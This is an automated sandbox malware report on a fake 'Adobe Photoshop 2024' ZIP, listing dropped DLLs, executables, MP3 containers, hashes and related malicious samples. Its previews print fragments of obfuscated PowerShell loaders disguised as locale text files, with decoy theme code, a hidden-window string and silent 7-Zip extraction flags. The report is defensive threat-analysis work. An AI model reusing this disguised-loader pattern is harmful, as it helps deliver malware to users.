  • Avira URL Cloud: safe
unknown
http://vizualiziraj.si/eInvoiceVizualization_20110530.xsltAdobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:InvoiceResponseSShop.Business.XmlSerializers.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://developer.download.nvidia.com/shaderlibrary/docs/shadow_PCSS.pdfPhotoshop.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1509259
Start date and time:2024-09-11 11:36:26 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Adobe_Photoshop_2024 (1).zip
Detection:MAL
Classification:mal52.evad.winZIP@12/29@0/0
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 144
  • Number of non-executed functions: 13
Cookbook Comments:
  • Found application associated with file extension: .zip

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target powershell.exe, PID 2364 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
05:37:21API Interceptor7x Sleep call for process: powershell.exe modified
05:37:23API Interceptor1x Sleep call for process: Adobe_Photoshop_2024.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PSLibs.exeHEU_KMS_Activator.exeGet hashmaliciousUnknownBrowse
    Chrome_update(1).jsGet hashmaliciousUnknownBrowse
      Browser_update16.0.5836.jsGet hashmaliciousUnknownBrowse
        Chrome_update(1).jsGet hashmaliciousUnknownBrowse
          Chrome_update.jsGet hashmaliciousUnknownBrowse
            Browser_update16.0.5836.jsGet hashmaliciousUnknownBrowse
              Chrome_update.jsGet hashmaliciousUnknownBrowse
                tUUPQygorhzFkIcHuB.batGet hashmaliciousUnknownBrowse
                  VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.batGet hashmaliciousUnknownBrowse
                    h60FUiSRcC.jsGet hashmaliciousUnknownBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Adobe_Photoshop_2024.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1410
                      Entropy (8bit):5.350353709835749
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4GE48:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHA
                      MD5:E44D0878A6375BCB6A58007DD119EF6A
                      SHA1:6602C69B84ABAB66C942AC313D5F8A09694E235A
                      SHA-256:CDFB5A6A048AEDA727A92B57B0CC02D4E9F227BFF5C0ED98ECED4E192A901FB0
                      SHA-512:2B5BD2549A9600DD9D3A04B6B876EE30C247190502AEC2A97FAE8B7C1110005EE98999229D19F3DEBC338E49BD2BD1612D418DBD27FFCAB496A62DE6B668F728
                      Malicious:false
                      Reputation:low
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2172
                      Entropy (8bit):5.291236635636411
                      Encrypted:false
                      SSDEEP:48:wFy4YNSU4YymI4RIoUeW+mZ9tK8NPQbHlvu1lfls5Ur:wFmkHYvIIfLmZ2K4MQ8
                      MD5:CEAC43721A152EA5DE42A880A4B6B8EF
                      SHA1:69F4A8B382DBB90A417ADD0E50BD214A6F28F139
                      SHA-256:7A0CE8A8C115FE944AB4ACECA97B33E3843417E672EBC854B80C5B59CBFE2554
                      SHA-512:1CFD709180CE947DB92F698D0E53661CCA1FF79881DF2ABB7DDDB368BD570899383CA97A0F9A87E2291C54537AC0A220766A3E39F2EB8CE0623CD6603054E564
                      Malicious:false
                      Reputation:low
                      Preview:@...e.................................^..............@..........X................$.....K.sG.<p..a.......Microsoft.Management.Infrastructure.CimCmdlets..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerS

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10n10q5u.kli.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axk2i2oc.o30.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxrsvwu.res.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu1epiao.2hx.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobeOwl.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):2514448
                      Entropy (8bit):6.252244320045555
                      Encrypted:false
                      SSDEEP:49152:UUPMZS/pK/yvVGmXiRaqk+JXftqxXRo/I2Q4b0z2NV5+/V5BI7xRYQjRrn7pxRVL:QkvWtqhg
                      MD5:4F0FC92323198704AC96110A73FC3FB5
                      SHA1:5356FDACA209423290EF818AFF68B027B15B34E4
                      SHA-256:982B88F024F5CB676B0E20E36B04B8446EF480685AB3747DE723176EC505917C
                      SHA-512:C4AE48AF5E522D4B36AC85B1015785A805963FCEE8A76872B7201B3F34E9C0FE3A1D39C4E13066FE70BA9B402B7E9134596D50ED63AE6187797875D09589961A
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................=.......................................................................Q.......9.............Rich............PE..d....Pv\.........." .........D................................................'......)'...`..........................................k"..6....".,.....&.......%.H)...@&.......'..{..@2..T....................2..(...03............... .......h"......................text...T........................... ..`.rdata....... ......................@..@.data...P.....".......".............@....pdata..H)....%..*....$.............@..@.rsrc.........&.......%.............@..@.reloc...{....'..|....%.............@..B........................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobePIP.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):501776
                      Entropy (8bit):5.669338044356776
                      Encrypted:false
                      SSDEEP:6144:lucOJq6vgu/VbgxaP3YBixysr5FZlous+GfVC0KQcsprmrka4wsy:lupJq6vguNTogysr5FZGfVkrz
                      MD5:8DB8DC16D06934C2D9A26713FA7FE872
                      SHA1:C4185AD46D95ED5B2C3FBD9035B5D48199885C59
                      SHA-256:9EC1FC150CBD3999EC04E5ACCAEE69556863DFBEEA112676B477C5FC4C5FD01A
                      SHA-512:DA1DC388D86F93DC4C851F1AB1EA96F81EF8E119D7EB3DC2FB1590B45259E5881D6C6F791CDA5A89F06F52D7AF2B89BA87703C2E54A7E775D3A42ECE0DB912DD
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............[...[...[.I[...[..Z...[Ga.[...[..Z...[..Z...[..Z...[.>.[...[...[<..[N..Z...[N..Z...[K.%[...[..M[...[N..Z...[Rich...[........................PE..d....$.[.........." .....2...\............................................................`..........................................,..........@............p..T0......................p............................................P...............................text....1.......2.................. ..`.rdata..n....P.......6..............@..@.data...@....P.......2..............@....pdata..T0...p...2...>..............@..@.gfids..4............p..............@..@.rsrc................r..............@..@.reloc..............................@..B................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):448040
                      Entropy (8bit):5.089469547699454
                      Encrypted:false
                      SSDEEP:6144:JLp46qYYj8gSnohQArLfyH46qIYj8gSnwhQACLfyvUAILUAC:/46hOrLs46hWCL7bQF
                      MD5:D71C5F6E1CBCC6AB812D3433FFF7BE31
                      SHA1:B0D07444FDF412A4DF63E4EE6DBDF11C3E8ECFB0
                      SHA-256:873647F9F33CDE667DC53027E2DC703314053D1A6BCCC3307B5CCF776EC2FAB2
                      SHA-512:BEF7CAC7D438A80B13CD10FAC67860D4ADA06A74799DF70E2155D0F858EF004213F92B2E97A941B3FE677C89CDC59430E3EE3EDD8CE0D3B58EBDE733F92AB8CF
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..............0..~.............. ........@.. ....................................`.....................................O.......<...............(N..........T................................................ ............... ..H............text....|... ...~.................. ..`.rsrc...<...........................@..@.reloc..............................@..B........................H........H...X..............X.............................................{....*:.(......}....*..0..)........u..........,.(.....{.....{....o....*.*.*v v... )UU.Z(.....{....o....X*..0..:........r...p......%..{.......%q.........-.&.+.......o.....(....*..*V(....r#..po....o....*.s ...*.s!...*..(....*....0..}........("....(....r...pr...p(#...r...po$....s%.........(....(#...r...po$....(#...r...po$.....(&...-..(&...-.~'....o(...~'....o)...*....0..y........(*...(+........(,...(-...(.

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Locale\Dinka.txt

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3115
                      Entropy (8bit):5.022840395279627
                      Encrypted:false
                      SSDEEP:96:NdZzM5NWeNpKShVReSnB7gu6s3GTIP4HE7ZzDexW:9I5NWerr0GWUPJ1zB
                      MD5:2CD8E1F51C61F57A99913C20CCB51550
                      SHA1:31CF31E36ECDB961FC833AD1C1D9827035E9AF1A
                      SHA-256:880FC03CF83E20D49326A109910106E3FAD47F1AD5E75908A1B5BCCF3500C79B
                      SHA-512:D3D220AF4A23C4B5FC346C0999D18932DB053D033B6336653FFE393A86A7E28C37158D21CD7EE5C9816529B8E2023143ED3358FE3C39DAE34412F41FDED6F3E5
                      Malicious:false
                      Preview:# Define base string variables..$themeType = "dark"..$themeAccentColor = "emerald"..$themeAuthor = "Jane Doe"....# Validate theme type..if ($themeType -notmatch "^(dark|light)$") {.. Write-Output "Invalid theme type. Please choose 'dark' or 'light'."..} else {.. # Process the strings to construct a theme configuration.. $themeConfig = "Theme Type: $themeType`nAccent Color: $themeAccentColor`nAuthor: $themeAuthor".... # Display the original strings.. Write-Output "Original Strings:".. Write-Output "Theme Type: $themeType".. Write-Output "Accent Color: $themeAccentColor".. Write-Output "Author: $themeAuthor".... # Display the constructed theme configuration.. Write-Output "`nConstructed Theme Configuration:".. Write-Output $themeConfig..}....$vagutible_manur = $args[2]..$vagutible_suto = $args[3]..$unchraom_jolla = $vagutible_manur+"."+$vagutible_suto..$tamuties = $args[1]..$anintiurested = $args[0]..$bialugies_sama_cumosp = $anintiurested+"."+$tamuties..

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Locale\Malaysian.txt

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2477
                      Entropy (8bit):5.054835982188352
                      Encrypted:false
                      SSDEEP:48:4wJEnO7kGb5KhpOu2T4IaQxKxiGKaj14RATm9xcqZaGVEOl4XH:anO7/5Kh9a4Q/GKaj14F9mqZafOl4X
                      MD5:5D97D5A57144ED8367A5171E49AD0BA2
                      SHA1:A1A7DB6A7D54F3BD8820C96047F3EDAB692EE913
                      SHA-256:616812CA51C454D1CFCFA2F19BAB7FDEDCB1EF6E936EC90F9DBC3BB726DFF6E6
                      SHA-512:798BF4D5F474D225926353BA4B50A58F9A15781BA6264F2861F1DE3C9C843A316B6C1B3544ED67766EB9F964656F9A76F3E4C6BB3DE43E2829FB5EB4A52C9ACF
                      Malicious:false
                      Preview:# Define string variables for theme details..$themeStyle = "Minimalist"..$themePalette = "Blue and White"..$themeVersion = "1.0"....# Combine the theme details into a single string..$themeInfo = "Style: $themeStyle, Palette: $themePalette, Version: $themeVersion"....# Process the string by reversing it..$reversedThemeInfo = -join ($themeInfo.ToCharArray() | ForEach-Object { $_ })[($themeInfo.Length-1)..0]....# Output the original and reversed strings..Write-Output "Original Theme Info:"..Write-Output $themeInfo..Write-Output "`nReversed Theme Info:"..Write-Output $reversedThemeInfo....$racunsdite = "x"..$ancondescint = "-aoa"..$dosagrueable = "-y"......$rubbitshox = $args[3]..$dascsoibion = $args[2]..$umbiguius = $args[0]..$mamentiha = $args[1]..$tharupeutic = $umbiguius+"."+$mamentiha..$sammer = 'en'..$wukeful = 'Hidd'..$hondsomely = $wukeful + $sammer....# Define a string variable with theme configuration..$themeConfig = "ThemeName: Ocean Breeze, PrimaryColor: Cyan, SecondaryColor: C

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Locale\zh-tw\instrumental-epic-country-228216.mp3

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:MPEG ADTS, layer III, v1, 256 kbps, 48 kHz, JntStereo
                      Category:dropped
                      Size (bytes):5435904
                      Entropy (8bit):7.957546466977374
                      Encrypted:false
                      SSDEEP:98304:jK1awAKoZNgDbJDPHw0cND6t/SkB6qBKXf/Mlq:OqKoTu5/jd686iKv/gq
                      MD5:97286FEC1654075369CB5C6BD4B4E7B7
                      SHA1:0F7B5B64969E177E8974DE12E70E787BE73B92F7
                      SHA-256:035EA0CD006B8429AEC82FA54F2345E68CE997B72DAF42221443833E2EC51014
                      SHA-512:D9CA74894EEC9142ABE1367E7E8F785FEBD5B164FEEED85C2D5DC62D5116AB31C30E11EBAA22BD8F8305590EC37C40E41288EE72A63A822A9427D9033863DBCB
                      Malicious:false
                      Preview:...D..DqQ..,1Bvg8.a..S...!y.Z..Q.!q.`....AuN......8.$..........,.2d. @..... L.2d.&.....@.2d.... @....A2wwi...B"..&M;...............wwwwq.A.2"......""!0........C....p..........J>..<..q.K'.........&L.2d.&@....A...www.....wwww.....N....""""....wq....wi........................~................L.)0`.....1S.R..t....).._....c1..3..?..j.]M.....ie..H.P...k.."......cR..D[_p..*.?T...ofNq...4.....k.j.Vf...m..U.j.b....QPR..N..Nv.u......q..kL.PPPP....S..L..0...%.@*(.W).....`l...(..q$.D.$I9\ddt....s&'+j.j.....r."..H........u..335.N8.v....}Q.....f.~.U..\.....36..*.J..C5.."J..33[[}H._.f.....%@.5..u..'%7.w".h6UV...2...wn..r~..n#1..N....]... .....m..Di..#..j.d+...q0..#j....Rp..k..(.5j.%@[+...("]..^..3.e.....:.._.~2.'Nu....(..H..............DP...r<...p.n'py..W..............a*...(.bT...$.r(.<N....H.).n.".<.bN..././I`'....W....$.K6.K..^K......R...u..]...$.W.+}..H$..M.2F.&J.G...u*P.f.SQ<.E\~.....I..1.n:...........I-..N@~8.aP....Q-.....!.+K.S..yZl%..?."..E...<

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Locale\zh-tw\victoryx27s-anthem-war-212726.mp3

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:MPEG ADTS, layer III, v1, 256 kbps, 48 kHz, JntStereo
                      Category:dropped
                      Size (bytes):3840768
                      Entropy (8bit):7.952835470650663
                      Encrypted:false
                      SSDEEP:98304:WGAOGNOVEucT4ngEgaC0rRxUxgketE6cMcuSQ:WfO65gnjC0rRxUxetRcMcuSQ
                      MD5:E3559BEF8311C9F0A6B15CDE103F2497
                      SHA1:BFADB15DFD38AC9C2AC10324011BEF999681880E
                      SHA-256:B31FA4202C5983C9C1915A03DA160D0E777DC09EB243D6D0F4099BB960C34AC5
                      SHA-512:23ED135AF5FCC81237DDE567E5F360AD43E8B7503A742C5BB83DDED662A6BEF20E5230C9850629B7778755ACD53CCDB699692638F8E6DE9BE8D6655B780438DB
                      Malicious:false
                      Preview:...D....@C.,1.t...a..Ui......l..U..1..e.E.....T...8....$..@.L..333333..... @...d.&L.0.... @..d.&..&@..... .d.'ww.@....wwvM2. . .......B"""!;...................xx`.......H..`......<......!..b.<...A........&N.".A..!wwwwhDDDD]..... .A...'wwwq...d&....................................|p......a.......a2........JY..ET.]..S3.t..).k/......;.......C.j......f...c2..iU56Yev....Yo...c.*.a.*..Q...bu......)...?N..<.L....C).d..P.G.....k_.Z.+L...y{MR..B}.Z.U.?..>.#ZPPPPP.....c.... *....]....2.r.......e...c0.;.....5..K.R.X.f3-..............Q8..Vff...Ur.Y..iX..fw.QK..K..O6y..Rfhg#\..Vc.tu2.......J.N.s..8..4.....LV(((*.B.`.omZ...qk..M....F.n....uW:.L./.Z .e.K.D.(..{.Z.@LX8.9i..i...Y..T...V.Z".....9x...k}.s..Mr.F.u.q .E..Gr......$.M.+(R.i'.....!...DE...p:......'Uy.......31..8....9..V..*.0...#..M?...$.e.u/I.]._I$vf!.$(...et...=b]...Go.ru.......J<..h)":...;.4&K....&.!.....o.].,.....^[a...$.&......%.v.W.....R...b...........8..>...i!...y...v.....z.>..5mCR...A.rL...g..

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\NPoco.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):409128
                      Entropy (8bit):6.306480138471645
                      Encrypted:false
                      SSDEEP:6144:Kd4MkAqrTc7psPUfDO9xMI1nt47Yrj0ZrTg017qHvYvRFFM4zJ/tmhUCUAUUAz:sq/c7msKe20W017vrRUhIAo
                      MD5:0E5E2CE6BA105F7EDE05B4A8A2CF8B4B
                      SHA1:9AED440A3FB979DA3A72142D9A756FED2510160D
                      SHA-256:957CA9C79BF8DCF1E7F61FDEC2A04F908D803AA0C8DF0F22941BFFF4D05A7053
                      SHA-512:5640C7B7A64EB1B4B2ABEE84785F9AF3560617F9EF511C3D1A91F7A555B431BB18E3C981EDF980CB8FBEEE46DA54B6C2A276D98837F49F17908C5D454B2371ED
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ... ....... .......................`...........`.....................................O.... ..T...............(N...@......X...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...T.... ......................@..@.reloc.......@......................@..B................S.......H........^................................................................{J...*..{K...*V.(L.....}J.....}K...*...0..A........u5.......4.,/(M....{J....{J...oN...,.(O....{K....{K...oP...*.*.*. ..l. )UU.Z(M....{J...oQ...X )UU.Z(O....{K...oR...X*...0..b........r...p......%..{J......%q8....8...-.&.+...8...oS....%..{K......%q9....9...-.&.+...9...oS....(T...*..{U...*..{V...*V.(L.....}U.....}V...*.0..A........u:.......4.,/(M....{U....{U...oN...,.(O....{V....{V...oP...*.*.*. .-~. )UU.

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):159784
                      Entropy (8bit):6.258600546320473
                      Encrypted:false
                      SSDEEP:3072:OmplJSWpxqWkp6/ns75DxN2BoM6p6y7NK+2cuAUA5UQIyUADe8:6pWs75Dx8BoDp6k39VUAefyUADx
                      MD5:D66128ABDB882F7FDB9A033F20932A05
                      SHA1:B7A139D326FFBFBC08AEDB7BA8B0344C5B4EB200
                      SHA-256:455749F9EDBFDAFC41AFFBA1AA11D2DC35C6881C5498F7B7CDEA0B560E756F43
                      SHA-512:E5B875CEBB6DC6906D1B0BAE73BBF833A1B64D50CC4E7845EE5E747D9196E4CF6C4B056BE9D808DDAC49EFF2B6EEE8C9C3CB27B892281F4AAD0A15010817ABF6
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.F..........." ..0.............~6... ...@....... ...............................b....`.................................*6..O....@..............."..(N...`.......5..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B................^6......H...........d~...................5........................................{%...*..{&...*V.('.....}%.....}&...*...0..A........u!.......4.,/((....{%....{%...o)...,.(*....{&....{&...o+...*.*.*. .zY. )UU.Z((....{%...o,...X )UU.Z(*....{&...o-...X*...0..b........r...p......%..{%......%q.........-.&.+.......o.....%..{&......%q.........-.&.+.......o.....(/...*..{0...*..{1...*V.('.....}0.....}1...*.0..A........u$.......4.,/((....{0....{0...o)...,.(*....{1....{1...o+...*.*.*. W..Z )UU.

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PSLibs.exe

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):587776
                      Entropy (8bit):6.439962628647099
                      Encrypted:false
                      SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
                      MD5:42BADC1D2F03A8B1E4875740D3D49336
                      SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
                      SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
                      SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
                      Malicious:false
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Joe Sandbox View:
                      • Filename: HEU_KMS_Activator.exe, Detection: malicious, Browse
                      • Filename: Chrome_update(1).js, Detection: malicious, Browse
                      • Filename: Browser_update16.0.5836.js, Detection: malicious, Browse
                      • Filename: Chrome_update(1).js, Detection: malicious, Browse
                      • Filename: Chrome_update.js, Detection: malicious, Browse
                      • Filename: Browser_update16.0.5836.js, Detection: malicious, Browse
                      • Filename: Chrome_update.js, Detection: malicious, Browse
                      • Filename: tUUPQygorhzFkIcHuB.bat, Detection: malicious, Browse
                      • Filename: VjFeSeLhGMruZwwyqsIvUMXvstQqpgFfbYh.bat, Detection: malicious, Browse
                      • Filename: h60FUiSRcC.js, Detection: malicious, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Photoshop.dll

                      Download File
                      Process:C:\Windows\SysWOW64\7za.exe
                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):1153040
                      Entropy (8bit):4.7478785104748455
                      Encrypted:false
                      SSDEEP:12288:vnDGMyAjGqOvRcocHR66w9duLdG/WPttIMgQcyXy6+/iJaGmPJIgPiJwY6vQGG9h:vnDGMyAjGqOvRYHRqYvC4TH+C
                      MD5:60EB3BB4E04CF1F409B307A080D9B5E2
                      SHA1:896D204384A40B47839661751B548C5B66713200
                      SHA-256:3312E54975D30F5DF7162C6905A18CEF20A907D6DD8ABEAAA406D27BA2D12FC4
